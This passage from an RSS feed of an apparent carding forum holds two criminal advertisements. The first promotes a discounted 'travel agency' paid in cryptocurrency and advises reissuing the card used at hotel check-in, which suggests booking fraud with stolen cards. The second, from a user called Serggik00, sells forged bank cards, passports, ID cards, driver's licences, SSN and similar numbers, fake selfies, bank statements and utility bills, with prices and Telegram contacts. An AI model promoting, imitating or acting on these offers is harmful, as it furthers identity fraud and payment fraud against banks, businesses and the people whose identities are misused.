<span style="font-weight: bold;" class="mycode_b">For contactless check-in (often used when booking villas and apartments),</span><br />
<span style="font-weight: bold;" class="mycode_b">the chatbot will send instructions in a dialog box with a PIN or QR code for entry.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">If reception asks for a credit card, you can mention that you are using cryptocurrency.</span><br />
<span style="font-weight: bold;" class="mycode_b">Sometimes the hotel may retain a small deposit as a security deposit (minibar, spa, property).</span><br />
<span style="font-weight: bold;" class="mycode_b">The deposit is refunded upon check-out.</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">⚠️ Important: Please reissue your card if you used it to check in at the hotel.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">What documents do you need to bring?</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Passport</span></span><br />
<img src="https://i.ibb.co/HDjVZsNJ/6.jpg" loading="lazy"  alt="[Image: 6.jpg]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Birth certificate for children</span></span><br />
<img src="https://i.ibb.co/j9kx3bHG/7.jpg" loading="lazy"  alt="[Image: 7.jpg]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Voucher with number Bookings</span></span><br />
<img src="https://i.ibb.co/k6yhhDdP/8.jpg" loading="lazy"  alt="[Image: 8.jpg]" class="mycode_img" /><br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Full range of agency services</span></span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Book a flight — buy an airline ticket with a ~40% discount.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Rent a car — book the desired class of car for your trip for 50% off the official price.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Book your stay — hotel rooms, villas, and apartments with savings of up to 40%.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-size: medium;" class="mycode_size">Yacht cruise on the open ocean — ships equipped with every comfort! The journey lasts several days.</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="color: #e82a1f;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Our website - <a href="https://booking-travel-enjoy.gitbook.io/bookig-travel-enjoy" target="_blank" rel="noopener" class="mycode_url">https://booking-travel-enjoy.gitbook.io/...avel-enjoy</a></span></span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Drawing service @Serggik00]]></title>
			<link>https://cardmine.cc/showthread.php?tid=1040</link>
			<pubDate>Thu, 11 Jul 2024 11:48:47 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://cardmine.cc/member.php?action=profile&uid=223">Serggik00</a>]]></dc:creator>
			<guid isPermaLink="false">https://cardmine.cc/showthread.php?tid=1040</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://i.ibb.co/z6F00Sn/otricovkagif.gif" loading="lazy"  alt="[Image: otricovkagif.gif]" class="mycode_img" /></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #008e02;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">Good afternoon Dear Ladies and Gentlemen of the Forum !!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">Many people have known me on this forum for more than one year, as well as I am known to many on dozens of other resources and friendly sites. I am an active seller in another field! On all resources, I practically have the status of a veteran, respected, moderator, verified seller with all kinds of checks and deposits passed, I have thousands of reviews with gratitude and many partners and friends from different countries! Today I want to present you my  service <a href="https://t.me/Serggik00_OtrisovcaNEW2020" target="_blank" rel="noopener" class="mycode_url">https://t.me/Serggik00_OtrisovcaNEW2020</a> which I am sure you will like it and you will appreciate it in the future !!!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">Being on the resources of this topic, for many years I did not have ANY FINANCIAL ARBITRATION and debt !!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">My team has been trained for more than 4 years by such RESPECTED people as: FLOPPI, DINOSAURIK, EXTREMAL, who I think will proudly say that we are ready for professional work. A lot of material was purchased for work on this topic, as well as professional equipment to demonstrate the best quality of the work performed. The completed work is provided to you in the form that you wish (printout, lamination, photo, scan in a cleaned form), which guarantees high throughput, since in fact you will not see any traces of editing!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">Thanks to my disciplinary qualities, I achieved the same from my team !!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">Many of you have come across how difficult it is at night to find a person who will fulfill the order, you no longer need to look for it, we are <a href="https://t.me/Serggik00_OtrisovcaNEW2020" target="_blank" rel="noopener" class="mycode_url">https://t.me/Serggik00_OtrisovcaNEW2020</a>.</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #008e02;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">I suggest friends:</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">- cumulative system of discounts 4 + 1 for free</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">- to any "OLD MAN" through verification in the LAN up to 5 renderings on credit.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">- for wholesalers a decent discount (negotiated in the PM)</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">- Any buyer, even without a reputation with the guarantor of the old man CREDIT. My service is loyal and flexible and ready for any dialogues and negotiations !!!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">For 1.5 months <a href="https://t.me/Serggik00_OtrisovcaNEW2020" target="_blank" rel="noopener" class="mycode_url">https://t.me/Serggik00_OtrisovcaNEW2020</a> drew about 1000 clients for FREE to study the needs of customers and be good friends.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Many are ready to leave feedback and they will, I assure you. We have EVERYTHING, and we will produce what is not in a short time !!!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Bank card (CC) &#36; 8-13</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Passports (more than 40 countries) &#36; 8-12</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">ID card / DL / 8-14 &#36;</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">SSN / SNILS / INN 5 &#36;</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Selfie from &#36; 25</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Statement BA / Bank statement with your transactions &#36; 8-12</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Utility bill / Receipts of housing and communal services 4-8 &#36;</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Editing your documents</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">For all questions, please contact telegram <a href="https://t.me/Serggik00_OtrisovcaNEW2020" target="_blank" rel="noopener" class="mycode_url">https://t.me/Serggik00_OtrisovcaNEW2020</a></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Telegram rendering channel (With reviews, discounts and promotions) <a href="https://t.me/Serggik00_Otrisovca_promo" target="_blank" rel="noopener" class="mycode_url">https://t.me/Serggik00_Otrisovca_promo</a></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">To improve the quality of work, complaints and suggestions are accepted by Serggik00 <a href="https://t.me/ff55ff55f" target="_blank" rel="noopener" class="mycode_url">https://t.me/ff55ff55f</a></span></span></span></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://i.ibb.co/z6F00Sn/otricovkagif.gif" loading="lazy"  alt="[Image: otricovkagif.gif]" class="mycode_img" /></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #008e02;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">Good afternoon Dear Ladies and Gentlemen of the Forum !!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">Many people have known me on this forum for more than one year, as well as I am known to many on dozens of other resources and friendly sites. I am an active seller in another field! On all resources, I practically have the status of a veteran, respected, moderator, verified seller with all kinds of checks and deposits passed, I have thousands of reviews with gratitude and many partners and friends from different countries! Today I want to present you my  service <a href="https://t.me/Serggik00_OtrisovcaNEW2020" target="_blank" rel="noopener" class="mycode_url">https://t.me/Serggik00_OtrisovcaNEW2020</a> which I am sure you will like it and you will appreciate it in the future !!!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">Being on the resources of this topic, for many years I did not have ANY FINANCIAL ARBITRATION and debt !!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">My team has been trained for more than 4 years by such RESPECTED people as: FLOPPI, DINOSAURIK, EXTREMAL, who I think will proudly say that we are ready for professional work. A lot of material was purchased for work on this topic, as well as professional equipment to demonstrate the best quality of the work performed. The completed work is provided to you in the form that you wish (printout, lamination, photo, scan in a cleaned form), which guarantees high throughput, since in fact you will not see any traces of editing!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">Thanks to my disciplinary qualities, I achieved the same from my team !!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">Many of you have come across how difficult it is at night to find a person who will fulfill the order, you no longer need to look for it, we are <a href="https://t.me/Serggik00_OtrisovcaNEW2020" target="_blank" rel="noopener" class="mycode_url">https://t.me/Serggik00_OtrisovcaNEW2020</a>.</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #008e02;" class="mycode_color"><span style="font-size: medium;" class="mycode_size">I suggest friends:</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">- cumulative system of discounts 4 + 1 for free</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">- to any "OLD MAN" through verification in the LAN up to 5 renderings on credit.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">- for wholesalers a decent discount (negotiated in the PM)</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">- Any buyer, even without a reputation with the guarantor of the old man CREDIT. My service is loyal and flexible and ready for any dialogues and negotiations !!!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">For 1.5 months <a href="https://t.me/Serggik00_OtrisovcaNEW2020" target="_blank" rel="noopener" class="mycode_url">https://t.me/Serggik00_OtrisovcaNEW2020</a> drew about 1000 clients for FREE to study the needs of customers and be good friends.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Many are ready to leave feedback and they will, I assure you. We have EVERYTHING, and we will produce what is not in a short time !!!!</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Bank card (CC) &#36; 8-13</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Passports (more than 40 countries) &#36; 8-12</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">ID card / DL / 8-14 &#36;</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">SSN / SNILS / INN 5 &#36;</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Selfie from &#36; 25</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Statement BA / Bank statement with your transactions &#36; 8-12</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Utility bill / Receipts of housing and communal services 4-8 &#36;</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #005dc2;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Editing your documents</span></span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">For all questions, please contact telegram <a href="https://t.me/Serggik00_OtrisovcaNEW2020" target="_blank" rel="noopener" class="mycode_url">https://t.me/Serggik00_OtrisovcaNEW2020</a></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Telegram rendering channel (With reviews, discounts and promotions) <a href="https://t.me/Serggik00_Otrisovca_promo" target="_blank" rel="noopener" class="mycode_url">https://t.me/Serggik00_Otrisovca_promo</a></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ff4136;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">To improve the quality of work, complaints and suggestions are accepted by Serggik00 <a href="https://t.me/ff55ff55f" target="_blank" rel="noopener" class="mycode_url">https://t.me/ff55ff55f</a></span></span></span></div>]]></content:encoded>
		</item>
	</channel>
</rss>